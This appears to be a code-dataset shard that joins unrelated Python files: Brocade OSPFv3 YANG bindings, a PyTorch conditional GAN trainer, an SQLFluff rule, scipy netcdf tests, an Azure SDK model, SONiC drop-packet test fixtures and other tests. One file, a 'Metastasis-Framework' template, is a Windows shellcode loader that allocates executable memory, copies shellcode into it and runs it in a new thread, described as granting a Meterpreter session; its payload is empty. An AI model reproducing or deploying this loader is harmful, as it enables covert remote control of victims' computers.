t = YANGDynClass(v,base=ipsec_auth_key_config.ipsec_auth_key_config, is_container='container', presence=False, yang_name="ipsec-auth-key-config", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'cli-drop-node-name': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ipsec_auth_key_config must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=ipsec_auth_key_config.ipsec_auth_key_config, is_container='container', presence=False, yang_name="ipsec-auth-key-config", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'cli-drop-node-name': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)""",
})
self.__ipsec_auth_key_config = t
if hasattr(self, '_set'):
self._set()
def _unset_ipsec_auth_key_config(self):
self.__ipsec_auth_key_config = YANGDynClass(base=ipsec_auth_key_config.ipsec_auth_key_config, is_container='container', presence=False, yang_name="ipsec-auth-key-config", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'cli-drop-node-name': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
key_chain = __builtin__.property(_get_key_chain, _set_key_chain)
ipsec_auth_key_config = __builtin__.property(_get_ipsec_auth_key_config, _set_ipsec_auth_key_config)
_pyangbind_elements = {'key_chain': key_chain, 'ipsec_auth_key_config': ipsec_auth_key_config, }
| 60.850932
| 587
| 0.735225
|
a399a1cd9511df8e144d282c66259aa07549a6d8
| 2,293
|
py
|
Python
|
template/template.py
|
axano/Metastasis-Framework
|
ff42bcd7e6c4463ff4cbf0d9baba348d0416ca16
|
[
"MIT"
] | 3
|
2020-05-03T13:05:08.000Z
|
2020-07-02T05:23:33.000Z
|
template/template.py
|
axano/Metastasis-Framework
|
ff42bcd7e6c4463ff4cbf0d9baba348d0416ca16
|
[
"MIT"
] | null | null | null |
template/template.py
|
axano/Metastasis-Framework
|
ff42bcd7e6c4463ff4cbf0d9baba348d0416ca16
|
[
"MIT"
] | 1
|
2020-07-02T02:36:04.000Z
|
2020-07-02T02:36:04.000Z
|
import ctypes
# ctypes makes it very simple to interact with the Windows API in a python script,so it will be a required import for this script. It provides C compatible data types and allows calling functions in DLLs or shared libraries
shellcode = (
);
# Shellcode - This is the shellcode that will be injected into memory and then execute it which will grant us a juide ssl certified meterpreter session
# We will be using 4 Win32 APIs, to execute the shellcode, these APIs are very important in dynamic memory management on Windows Platforms
ptr = ctypes.windll.kernel32.VirtualAlloc(0,4096,ctypes.c_int(0x1000),ctypes.c_int(0x40))
# First VirtualAlloc() function will allow us to create a new executable memory region and copy our shellcode to it and after that execute it
b = bytearray() # Store b as bytearray() so our shellcode in Python3 won't be used as bytes but bytecode
b.extend(map(ord, shellcode))
buf = (ctypes.c_char * len(shellcode)).from_buffer(b)
# Buffer pool constructs an array that consists the size of our shellcode
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
# RtlMoveMemory() function accepts 3 arguments, a pointer to the destination (returned from VirtualAlloc()), a pointer to the memory to be copied and the number of bytes to be copied,in our case the size of the shellcode
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# CreateThread() accepts 6 arguments in our case the third argument is very important, we need to pass a pointer to the application -defined function to be executed by the thread returned by VirtualAlloc() if the function succeds,the return value is a handle to the new thread.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1)))
# WaitForSingleObject() function accepts 2 arguments, the first one is the handle to the object (returned by CreateThread()) and the time-o
| 88.192308
| 277
| 0.69167
|
671a2a7a05811b8fddca5dc1bcc9bbd78e0c5f10
| 8,649
|
py
|
Python
|
experiments/image_generation/gans/cgan.py
|
habout632/gans
|
5a1f8859d81c3f0356b9b23901ed515d04309268
|
[
"MIT"
] | null | null | null |
experiments/image_generation/gans/cgan.py
|
habout632/gans
|
5a1f8859d81c3f0356b9b23901ed515d04309268
|
[
"MIT"
] | null | null | null |
experiments/image_generation/gans/cgan.py
|
habout632/gans
|
5a1f8859d81c3f0356b9b23901ed515d04309268
|
[
"MIT"
] | null | null | null |
import os
import torch
from torch import nn, optim
from torch.autograd.variable import Variable
from torchvision import transforms, datasets
import torch.nn as nn
from experiments.image_generation.utils import Logger
# mnist data
# def mnist_data():
# , transforms.Normalize((.5, .5, .5), (.5,.5,.5))
compose = transforms.Compose([transforms.ToTensor()])
out_dir = './dataset'
data = datasets.CIFAR10(root=out_dir, train=True, transform=compose, download=True)
# Load data
# data = mnist_data()
# Create loader with data, so that we can iterate over it
data_loader = torch.utils.data.DataLoader(data, batch_size=100, shuffle=True)
# Num batches
num_batches = len(data_loader)
# data_transform = transforms.Compose([
# # transforms.RandomResizedCrop(224),
# # transforms.RandomHorizontalFlip(),
# transforms.ToTensor(),
# # transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
# ])
# hymenoptera_dataset = datasets.ImageFolder(root='../dataset/extra_data', transform=data_transform)
# print(len(hymenoptera_dataset))
# data_loader = torch.utils.data.DataLoader(hymenoptera_dataset, batch_size=128, shuffle=True, num_workers=4)
# # Num batches
# num_batches = len(data_loader)
n_features = 3 * 64 * 64
n_channels = 3
width = 64
height = 64
n_out = 1
n_noise = 100
clip = 0.01
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
D_PATH = 'models/vgan/anime_d.pth'
G_PATH = 'models/vgan/anime_g.pth'
# custom weights initialization called on netG and netD
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
nn.init.normal_(m.weight.data, 0.0, 0.02)
elif classname.find('BatchNorm') != -1:
nn.init.normal_(m.weight.data, 1.0, 0.02)
nn.init.constant_(m.bias.data, 0)
class DiscriminatorNet(nn.Module):
"""
A three hidden-layer discriminative neural network
"""
def __init__(self):
super(DiscriminatorNet, self).__init__()
# n_features = 784
# n_out = 1
self.hidden0 = nn.Sequential(
nn.Conv2d(3, 64, 3, stride=2, padding=1, ),
nn.LeakyReLU(0.2),
# nn.MaxPool2d(2, 2)
)
self.hidden1 = nn.Sequential(
nn.Conv2d(64, 128, 3, stride=2, padding=1),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.2),
# nn.MaxPool2d(2, 2)
)
self.hidden2 = nn.Sequential(
nn.Conv2d(128, 256, 3, stride=2, padding=1),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.2),
# nn.MaxPool2d(2, 2, ceil_mode=True)
)
# self.hidden3 = nn.Sequential(
# nn.Conv2d(256, 512, 3, stride=2, padding=1),
# nn.BatchNorm2d(512),
# nn.LeakyReLU(0.2),
# # nn.MaxPool2d(2, 2, ceil_mode=True)
# )
self.out = nn.Sequential(
# nn.Conv2d(256, 1, 4, padding=0),
nn.Linear(256 * 4 * 4 + 10, n_out),
# nn.Conv2d(512, 1, 5, stride=2, padding=1),
# nn.BatchNorm1d(n_out),
# in wgan, should not use sigmoid
nn.Sigmoid()
)
def forward(self, x, y):
"""
input 3*64*64
:param x:
:return:
"""
x = self.hidden0(x)
x = self.hidden1(x)
x = self.hidden2(x)
# x = self.hidden3(x)
x = x.view(-1, 256 * 4 * 4)
x = torch.cat((x, y), 1)
x = self.out(x)
return x
discriminator = DiscriminatorNet()
# # load model
# if os.path.isfile(D_PATH):
# discriminator.load_state_dict(torch.load(D_PATH))
discriminator.to(device)
discriminator.apply(weights_init)
def images_to_vectors(images):
return images.view(images.size(0), n_features)
def vectors_to_images(vectors):
return vectors.view(vectors.size(0), n_channels, width, height)
class GeneratorNet(nn.Module):
"""
A three hidden-layer generative neural network
"""
def __init__(self):
super(GeneratorNet, self).__init__()
# n_features = 100
# n_out = 784
# self.hidden0 = nn.Sequential(
# nn.Linear(n_noise, 4 * 4 * 1024),
# nn.BatchNorm1d(4 * 4 * 1024),
# nn.ReLU()
# )
self.hidden0 = nn.Sequential(
nn.ConvTranspose2d(110, 512, 4, 1, 0),
nn.BatchNorm2d(512),
nn.ReLU()
)
self.hidden1 = nn.Sequential(
nn.ConvTranspose2d(512, 256, 4, 2, 1),
nn.BatchNorm2d(256),
nn.ReLU()
)
self.hidden2 = nn.Sequential(
nn.ConvTranspose2d(256, 128, 4, 2, 1),
nn.BatchNorm2d(128),
nn.ReLU()
)
self.out = nn.Sequential(
nn.ConvTranspose2d(128, 3, 4, 2, 1),
# nn.BatchNorm2d(64),
nn.Tanh()
)
# self.out = nn.Sequential(
# nn.ConvTranspose2d(64, 3, 4, 2, 1),
# nn.Tanh()
# )
def forward(self, x):
x = x.view(-1, 110, 1, 1)
x = self.hidden0(x)
x = self.hidden1(x)
x = self.hidden2(x)
# x = self.hidden3(x)
x = self.out(x)
return x
generator = GeneratorNet()
#
# if os.path.isfile(G_PATH):
# generator.load_state_dict(torch.load(G_PATH))
generator.to(device)
generator.apply(weights_init)
def noise(size):
"""
Generates a 1-d vector of gaussian sampled random values
"""
# n = Variable(torch.randn(size, 100))
n = torch.randn((size, 100), requires_grad=True).to(device)
# n = torch.randn((size, 100, 1, 1), requires_grad=True).to(device)
# n = torch.randn((size, 100), requires_grad=True).to(device)
return n
d_optimizer = optim.RMSprop(discriminator.parameters(), lr=0.0002)
g_optimizer = optim.RMSprop(generator.parameters(), lr=0.0002)
def train_discriminator(optimizer, real_data, fake_data, y):
N = real_data.size(0)
# Reset gradients
optimizer.zero_grad()
# 1.1 Train on Real Data
prediction_real = discriminator(real_data, y)
# Calculate error and backpropagate
# error_real = loss(prediction_real, ones_target(N))
# error_real.backward()
# 1.2 Train on Fake Data
# fake_data = fake_data.view(-1, 3, 64, 64)
prediction_fake = discriminator(fake_data, y)
# Calculate error and backpropagate
# error_fake = loss(prediction_fake, zeros_target(N))
# error_fake.backward()
D_loss = -(torch.mean(prediction_real) - torch.mean(prediction_fake))
D_loss.backward()
# 1.3 Update weights with gradients
optimizer.step()
# weight(gradient) clipping
# # torch.clamp_(discriminator.parameters(), min=-clip, max=clip)
# w = discriminator.weight.data
# w = w.clamp(-clip, clip)
# discriminator.weight.data = w
for p in discriminator.parameters():
p.data.clamp_(-clip, clip)
# Return error and predictions for real and fake inputs
# return error_real + error_fake, prediction_real, prediction_fake
return D_loss, prediction_real, prediction_fake
def train_generator(optimizer, fake_data, y):
N = fake_data.size(0)
# Reset gradients
optimizer.zero_grad()
# Sample noise and generate fake data
prediction = discriminator(fake_data, y)
# Calculate error and backpropagate
# error = loss(prediction, ones_target(N))
G_loss = -torch.mean(prediction)
G_loss.backward()
# Update weights with gradients
optimizer.step()
# Return error
return G_loss
num_test_samples = 16
test_noise = noise(num_test_samples)
test_condition = torch.randint(10, (num_test_samples,)).to(device)
test_labels = torch.zeros(num_test_samples, 10).to(device)
test_labels[torch.arange(num_test_samples), test_condition] = 1
test_z_y = torch.cat((test_noise, test_labels), 1).to(device)
# Create logger instance
logger = Logger(model_name='cGAN', data_name='cifar')
# Total number of epochs to train
num_epochs = 2000
for epoch in range(num_epochs):
for n_batch, samples in enumerate(data_loader):
(real_batch, real_labels) = samples
real_batch = real_batch.to(device)
real_labels = real_labels.to(device)
N = real_batch.size(0)
# 0. change to one-hot encoding
one_hot = torch.zeros(N, 10).to(device)
one_hot[torch.arange(N).to(device), real_labels] = 1
# one_hot.to(device)
# 1. Train Discriminator
# real_data = images_to_vectors(real_batch)
# Generate fake data and detach (so gradients are not calculated for generator)
z = noise(N)
z_y = torch.cat((z, one_hot), 1).to(device)
y = one_hot
fake_data = generator(z_y).detach()
# Train D
d_error, d_pred_real, d_pred_fake = train_discriminator(d_optimizer, real_batch, fake_data, y)
# 2. Train Generator
# Generate fake data
fake_data = generator(z_y)
# Train G
g_error = train_generator(g_optimizer, fake_data, y)
# Log batch error
logger.log(d_error, g_error, epoch, n_batch, num_batches)
# Display Progress every few batches
if n_batch % 100 == 0:
# test_images = vectors_to_images(generator(test_z_y))
test_images = generator(test_z_y).data
logger.log_images(test_images.cpu(), num_test_samples, epoch, n_batch, num_batches)
# Display status Logs
logger.display_status(epoch, num_epochs, n_batch, num_batches, d_error, g_error, d_pred_real, d_pred_fake)
#
# # save model every 100 epoch
# if epoch % 10 == 0:
# torch.save(discriminator.state_dict(), D_PATH)
# torch.save(generator.state_dict(), G_PATH)
| 25.215743
| 109
| 0.700659
|
40635e8aa2700604895758adea4cc527eee337ac
| 794
|
py
|
Python
|
src/sqlfluff/rules/L012.py
|
markpolyak/sqlfluff
|
8d7ff6480d4807aabf208c99f65998870214fc51
|
[
"MIT"
] | 1
|
2021-12-29T21:56:44.000Z
|
2021-12-29T21:56:44.000Z
|
src/sqlfluff/rules/L012.py
|
markpolyak/sqlfluff
|
8d7ff6480d4807aabf208c99f65998870214fc51
|
[
"MIT"
] | 1
|
2021-09-15T18:20:39.000Z
|
2021-09-15T18:20:39.000Z
|
src/sqlfluff/rules/L012.py
|
markpolyak/sqlfluff
|
8d7ff6480d4807aabf208c99f65998870214fc51
|
[
"MIT"
] | null | null | null |
"""Implementation of Rule L012."""
from sqlfluff.rules.L011 import Rule_L011
class Rule_L012(Rule_L011):
"""Implicit/explicit aliasing of columns.
Aliasing of columns to follow preference
(explicit using an `AS` clause is default).
NB: This rule inherits its functionality from obj:`Rule_L011` but is
separate so that they can be enabled and disabled separately.
| **Anti-pattern**
| In this example, the alias for column 'a' is implicit.
.. code-block:: sql
SELECT
a alias_col
FROM foo
| **Best practice**
| Add `AS` to make it explicit.
.. code-block:: sql
SELECT
a AS alias_col
FROM foo
"""
config_keywords = ["aliasing"]
_target_elems = ("select_clause_element",)
| 20.894737
| 72
| 0.633501
|
095aee77fca61cd5b3f0814ab79811ff084e3d8b
| 170
|
py
|
Python
|
tests/model_control/detailed/transf_RelativeDifference/model_control_one_enabled_RelativeDifference_Lag1Trend_Seasonal_Hour_MLP.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | null | null | null |
tests/model_control/detailed/transf_RelativeDifference/model_control_one_enabled_RelativeDifference_Lag1Trend_Seasonal_Hour_MLP.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | 1
|
2019-11-30T23:39:38.000Z
|
2019-12-01T04:34:35.000Z
|
tests/model_control/detailed/transf_RelativeDifference/model_control_one_enabled_RelativeDifference_Lag1Trend_Seasonal_Hour_MLP.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | null | null | null |
import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['RelativeDifference'] , ['Lag1Trend'] , ['Seasonal_Hour'] , ['MLP'] );
| 42.5
| 92
| 0.764706
|
ab56cfe6e5e3527c691beca6dac656c72e8b0342
| 2,303
|
py
|
Python
|
test/test.py
|
kovacsv/DebugToFile
|
3dfdbe82895624e22252bd4da38f24ccd2204918
|
[
"MIT"
] | null | null | null |
test/test.py
|
kovacsv/DebugToFile
|
3dfdbe82895624e22252bd4da38f24ccd2204918
|
[
"MIT"
] | null | null | null |
test/test.py
|
kovacsv/DebugToFile
|
3dfdbe82895624e22252bd4da38f24ccd2204918
|
[
"MIT"
] | null | null | null |
import os
import subprocess
def WriteTitle (title):
print '--- ' + title + ' ---'
def Error ():
raise Exception ('Test Failed')
def GetFileLines (fileName):
file = open (resultFilePath)
lines = file.readlines ()
file.close ()
return lines
def GetCommandOutput (command):
process = subprocess.Popen (command, stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell = True)
out, err = process.communicate ()
return process.returncode, out, err
currentPath = os.path.dirname (os.path.abspath (__file__))
os.chdir (currentPath)
debugToFilePath = os.path.join ('..', 'solution', 'x64', 'Debug', 'DebugToFile.exe')
exampleProcessPath = os.path.join ('..', 'solution', 'x64', 'Debug', 'ExampleProcess.exe')
resultFilePath = 'test.txt'
WriteTitle ('Run process standalone')
ret, out, err = GetCommandOutput (exampleProcessPath)
print out
if ret != 1984:
Error ()
WriteTitle ('Run DebugToFile without parameters')
ret, out, err = GetCommandOutput (debugToFilePath)
print out
if ret != 1:
Error ()
if out != 'Usage: DebugToFile.exe [DebugLogFileName] [ApplicationName] <ApplicationArguments>\r\n':
Error ()
WriteTitle ('Run DebugToFile with invalid process')
ret, out, err = GetCommandOutput (debugToFilePath + ' NotExisting.exe ' + resultFilePath + ' NotExisting.exe')
print out
if ret != 1:
Error ()
if out != 'Error: Failed to start application\r\n':
Error ()
WriteTitle ('Run process with DebugToFile')
ret, out, err = GetCommandOutput (debugToFilePath + ' ' + resultFilePath + ' ' + exampleProcessPath)
print out
if ret != 1984:
Error ()
lines = GetFileLines (resultFilePath)
if lines[0] != exampleProcessPath + '\n':
Error ()
for i in range (1, len (lines)):
if lines[i] != str (i - 1) + '\n':
Error ()
os.remove (resultFilePath)
WriteTitle ('Run process with DebugToFile with parameters')
ret, out, err = GetCommandOutput (debugToFilePath + ' ' + resultFilePath + ' ' + exampleProcessPath + ' -a -b -c')
print out
if ret != 1984:
Error ()
lines = GetFileLines (resultFilePath)
if lines[0] != exampleProcessPath + '\n':
Error ()
if lines[1] != '-a\n':
Error ()
if lines[2] != '-b\n':
Error ()
if lines[3] != '-c\n':
Error ()
for i in range (4, len (lines)):
if lines[i] != str (i - 4) + '\n':
Error ()
os.remove (resultFilePath)
WriteTitle ('Result')
print 'OK'
| 27.094118
| 114
| 0.684325
|
9b66b87c6060fb35a82d4d9b0d62059ef3896513
| 4,740
|
py
|
Python
|
scipy/io/tests/test_netcdf.py
|
dlax/scipy
|
221cb8fa31c45d08ec6d9f946ebf9476bdc1fccd
|
[
"BSD-3-Clause"
] | 2
|
2015-10-30T10:04:46.000Z
|
2017-03-11T00:58:21.000Z
|
scipy/io/tests/test_netcdf.py
|
aidoom/scipy
|
112d9a25fe3b898eff862e4d4596409372a9b237
|
[
"BSD-3-Clause"
] | null | null | null |
scipy/io/tests/test_netcdf.py
|
aidoom/scipy
|
112d9a25fe3b898eff862e4d4596409372a9b237
|
[
"BSD-3-Clause"
] | null | null | null |
''' Tests for netcdf '''
import os
from os.path import join as pjoin, dirname
import shutil
import tempfile
import time
import sys
if sys.version_info[0] >= 3:
from io import BytesIO
else:
from StringIO import StringIO as BytesIO
from glob import glob
import numpy as np
from numpy.compat import asbytes
from scipy.io.netcdf import netcdf_file
from nose.tools import assert_true, assert_false, assert_equal, assert_raises
TEST_DATA_PATH = pjoin(dirname(__file__), 'data')
N_EG_ELS = 11 # number of elements for example variable
VARTYPE_EG = 'b' # var type for example variable
def make_simple(*args, **kwargs):
f = netcdf_file(*args, **kwargs)
f.history = 'Created for a test'
f.createDimension('time', N_EG_ELS)
time = f.createVariable('time', VARTYPE_EG, ('time',))
time[:] = np.arange(N_EG_ELS)
time.units = 'days since 2008-01-01'
f.flush()
return f
def gen_for_simple(ncfileobj):
''' Generator for example fileobj tests '''
yield assert_equal, ncfileobj.history, asbytes('Created for a test')
time = ncfileobj.variables['time']
yield assert_equal, time.units, asbytes('days since 2008-01-01')
yield assert_equal, time.shape, (N_EG_ELS,)
yield assert_equal, time[-1], N_EG_ELS-1
def test_read_write_files():
# test round trip for example file
cwd = os.getcwd()
try:
tmpdir = tempfile.mkdtemp()
os.chdir(tmpdir)
f = make_simple('simple.nc', 'w')
f.close()
# To read the NetCDF file we just created::
f = netcdf_file('simple.nc')
# Using mmap is the default
yield assert_true, f.use_mmap
for testargs in gen_for_simple(f):
yield testargs
f.close()
# Now without mmap
f = netcdf_file('simple.nc', mmap=False)
# Using mmap is the default
yield assert_false, f.use_mmap
for testargs in gen_for_simple(f):
yield testargs
f.close()
# To read the NetCDF file we just created, as file object, no
# mmap. When n * n_bytes(var_type) is not divisible by 4, this
# raised an error in pupynere 1.0.12 and scipy rev 5893, because
# calculated vsize was rounding up in units of 4 - see
# http://www.unidata.ucar.edu/software/netcdf/docs/netcdf.html
fobj = open('simple.nc', 'rb')
f = netcdf_file(fobj)
# by default, don't use mmap for file-like
yield assert_false, f.use_mmap
for testargs in gen_for_simple(f):
yield testargs
f.close()
except:
os.chdir(cwd)
shutil.rmtree(tmpdir)
raise
os.chdir(cwd)
shutil.rmtree(tmpdir)
def test_read_write_sio():
eg_sio1 = BytesIO()
f1 = make_simple(eg_sio1, 'w')
str_val = eg_sio1.getvalue()
f1.close()
eg_sio2 = BytesIO(str_val)
f2 = netcdf_file(eg_sio2)
for testargs in gen_for_simple(f2):
yield testargs
f2.close()
# Test that error is raised if attempting mmap for sio
eg_sio3 = BytesIO(str_val)
yield assert_raises, ValueError, netcdf_file, eg_sio3, 'r', True
# Test 64-bit offset write / read
eg_sio_64 = BytesIO()
f_64 = make_simple(eg_sio_64, 'w', version=2)
str_val = eg_sio_64.getvalue()
f_64.close()
eg_sio_64 = BytesIO(str_val)
f_64 = netcdf_file(eg_sio_64)
for testargs in gen_for_simple(f_64):
yield testargs
yield assert_equal, f_64.version_byte, 2
# also when version 2 explicitly specified
eg_sio_64 = BytesIO(str_val)
f_64 = netcdf_file(eg_sio_64, version=2)
for testargs in gen_for_simple(f_64):
yield testargs
yield assert_equal, f_64.version_byte, 2
def test_read_example_data():
# read any example data files
for fname in glob(pjoin(TEST_DATA_PATH, '*.nc')):
f = netcdf_file(fname, 'r')
f = netcdf_file(fname, 'r', mmap=False)
def test_itemset_no_segfault_on_readonly():
# Regression test for ticket #1202.
# Open the test file in read-only mode.
filename = pjoin(TEST_DATA_PATH, 'example_1.nc')
f = netcdf_file(filename, 'r')
time_var = f.variables['time']
# time_var.assignValue(42) should raise a RuntimeError--not seg. fault!
assert_raises(RuntimeError, time_var.assignValue, 42)
def test_write_invalid_dtype():
dtypes = ['int64', 'uint64']
if np.dtype('int').itemsize == 8: # 64-bit machines
dtypes.append('int')
if np.dtype('uint').itemsize == 8: # 64-bit machines
dtypes.append('uint')
f = netcdf_file(BytesIO(), 'w')
f.createDimension('time', N_EG_ELS)
for dt in dtypes:
yield assert_raises, ValueError, \
f.createVariable, 'time', dt, ('time',)
f.close()
| 31.6
| 77
| 0.655485
|
0fe3c628a8403ca80280ecb1963c6e7b148a7e96
| 2,583
|
py
|
Python
|
azure-mgmt-media/azure/mgmt/media/models/job_error_py3.py
|
NMijat1024/azure-sdk-for-python
|
c49e1d6d797dceaca81813cafb1a486d67185182
|
[
"MIT"
] | 1
|
2018-07-23T08:59:24.000Z
|
2018-07-23T08:59:24.000Z
|
azure-mgmt-media/azure/mgmt/media/models/job_error_py3.py
|
NMijat1024/azure-sdk-for-python
|
c49e1d6d797dceaca81813cafb1a486d67185182
|
[
"MIT"
] | 1
|
2018-11-29T14:46:42.000Z
|
2018-11-29T14:46:42.000Z
|
azure-mgmt-media/azure/mgmt/media/models/job_error_py3.py
|
NMijat1024/azure-sdk-for-python
|
c49e1d6d797dceaca81813cafb1a486d67185182
|
[
"MIT"
] | 1
|
2018-08-28T14:36:47.000Z
|
2018-08-28T14:36:47.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class JobError(Model):
"""Details of JobOutput errors.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar code: Error code describing the error. Possible values include:
'ServiceError', 'ServiceTransientError', 'DownloadNotAccessible',
'DownloadTransientError', 'UploadNotAccessible', 'UploadTransientError',
'ConfigurationUnsupported', 'ContentMalformed', 'ContentUnsupported'
:vartype code: str or ~azure.mgmt.media.models.JobErrorCode
:ivar message: A human-readable language-dependent representation of the
error.
:vartype message: str
:ivar category: Helps with categorization of errors. Possible values
include: 'Service', 'Download', 'Upload', 'Configuration', 'Content'
:vartype category: str or ~azure.mgmt.media.models.JobErrorCategory
:ivar retry: Indicates that it may be possible to retry the Job. If retry
is unsuccessful, please contact Azure support via Azure Portal. Possible
values include: 'DoNotRetry', 'MayRetry'
:vartype retry: str or ~azure.mgmt.media.models.JobRetry
:ivar details: An array of details about specific errors that led to this
reported error.
:vartype details: list[~azure.mgmt.media.models.JobErrorDetail]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'category': {'readonly': True},
'retry': {'readonly': True},
'details': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'JobErrorCode'},
'message': {'key': 'message', 'type': 'str'},
'category': {'key': 'category', 'type': 'JobErrorCategory'},
'retry': {'key': 'retry', 'type': 'JobRetry'},
'details': {'key': 'details', 'type': '[JobErrorDetail]'},
}
def __init__(self, **kwargs) -> None:
super(JobError, self).__init__(**kwargs)
self.code = None
self.message = None
self.category = None
self.retry = None
self.details = None
| 40.359375
| 77
| 0.629113
|
15dd16c91a20ba1abe6daab40e9abafcd6f86fb3
| 31,439
|
py
|
Python
|
tests/drop_packets/drop_packets.py
|
stephengao-ragilenetworks/sonic-mgmt
|
b7ce8f6592f12ee8a7a0daca9a4337d5eaf9313f
|
[
"Apache-2.0"
] | 1
|
2021-09-24T08:40:57.000Z
|
2021-09-24T08:40:57.000Z
|
tests/drop_packets/drop_packets.py
|
stephengao-ragilenetworks/sonic-mgmt
|
b7ce8f6592f12ee8a7a0daca9a4337d5eaf9313f
|
[
"Apache-2.0"
] | 4
|
2019-07-26T08:42:01.000Z
|
2020-12-16T08:34:52.000Z
|
tests/drop_packets/drop_packets.py
|
stephengao-ragilenetworks/sonic-mgmt
|
b7ce8f6592f12ee8a7a0daca9a4337d5eaf9313f
|
[
"Apache-2.0"
] | 1
|
2021-06-13T07:38:59.000Z
|
2021-06-13T07:38:59.000Z
|
import logging
import os
import importlib
import netaddr
import pytest
import random
import time
import ptf.testutils as testutils
import ptf.mask as mask
import ptf.packet as packet
from tests.common.helpers.assertions import pytest_assert, pytest_require
from tests.common.platform.device_utils import fanout_switch_port_lookup
from tests.common.helpers.constants import DEFAULT_NAMESPACE
from tests.common.utilities import get_inventory_files
RX_DRP = "RX_DRP"
RX_ERR = "RX_ERR"
L2_COL_KEY = RX_DRP
L3_COL_KEY = RX_ERR
pytest.SKIP_COUNTERS_FOR_MLNX = False
MELLANOX_MAC_UPDATE_SCRIPT = os.path.join(os.path.dirname(__file__), "fanout/mellanox/mlnx_update_mac.j2")
LOG_EXPECT_PORT_OPER_DOWN_RE = ".*Port {} oper state set from up to down.*"
LOG_EXPECT_PORT_OPER_UP_RE = ".*Port {} oper state set from down to up.*"
logger = logging.getLogger(__name__)
@pytest.fixture
def fanouthost(request, duthosts, rand_one_dut_hostname, localhost):
"""
Fixture that allows to update Fanout configuration if there is a need to send incorrect packets.
Added possibility to create vendor specific logic to handle fanout configuration.
If vendor need to update Fanout configuration, 'fanouthost' fixture should load and return appropriate instance.
This instance can be used inside test case to handle fanout configuration in vendor specific section.
By default 'fanouthost' fixture will not instantiate any instance so it will return None, and in such case
'fanouthost' instance should not be used in test case logic.
"""
duthost = duthosts[rand_one_dut_hostname]
fanout = None
# Check that class to handle fanout config is implemented
if "mellanox" == duthost.facts["asic_type"]:
for file_name in os.listdir(os.path.join(os.path.dirname(__file__), "fanout")):
# Import fanout configuration handler based on vendor name
if "mellanox" in file_name:
module = importlib.import_module("..fanout.{0}.{0}_fanout".format(file_name.strip(".py")), __name__)
fanout = module.FanoutHandler(duthost, localhost, get_inventory_files(request))
if not fanout.is_mellanox:
fanout = None
break
yield fanout
if fanout is not None:
fanout.restore_config()
@pytest.fixture(scope="module")
def pkt_fields(duthosts, rand_one_dut_hostname, tbinfo):
duthost = duthosts[rand_one_dut_hostname]
# Gather ansible facts
mg_facts = duthost.get_extended_minigraph_facts(tbinfo)
ipv4_addr = None
ipv6_addr = None
for item in mg_facts["minigraph_bgp"]:
if item["name"] == mg_facts["minigraph_bgp"][0]["name"]:
if netaddr.valid_ipv4(item["addr"]):
ipv4_addr = item["addr"]
else:
ipv6_addr = item["addr"]
class Collector(dict):
def __getitem__(self, key):
value = super(Collector, self).__getitem__(key)
if key == "ipv4_dst" and value is None:
pytest.skip("IPv4 address is not defined")
elif key == "ipv6_dst" and value is None:
pytest.skip("IPv6 address is not defined")
return value
test_pkt_data = Collector({
"ipv4_dst": ipv4_addr,
"ipv4_src": "1.1.1.1",
"ipv6_dst": ipv6_addr,
"ipv6_src": "ffff::101:101",
"tcp_sport": 1234,
"tcp_dport": 4321
})
return test_pkt_data
def expected_packet_mask(pkt):
""" Return mask for sniffing packet """
exp_pkt = pkt.copy()
exp_pkt = mask.Mask(exp_pkt)
exp_pkt.set_do_not_care_scapy(packet.Ether, 'dst')
exp_pkt.set_do_not_care_scapy(packet.Ether, 'src')
exp_pkt.set_do_not_care_scapy(packet.IP, 'ttl')
exp_pkt.set_do_not_care_scapy(packet.IP, 'chksum')
return exp_pkt
@pytest.fixture(scope="module")
def setup(duthosts, rand_one_dut_hostname, tbinfo):
"""
Setup fixture for collecting PortChannel, VLAN and RIF port members.
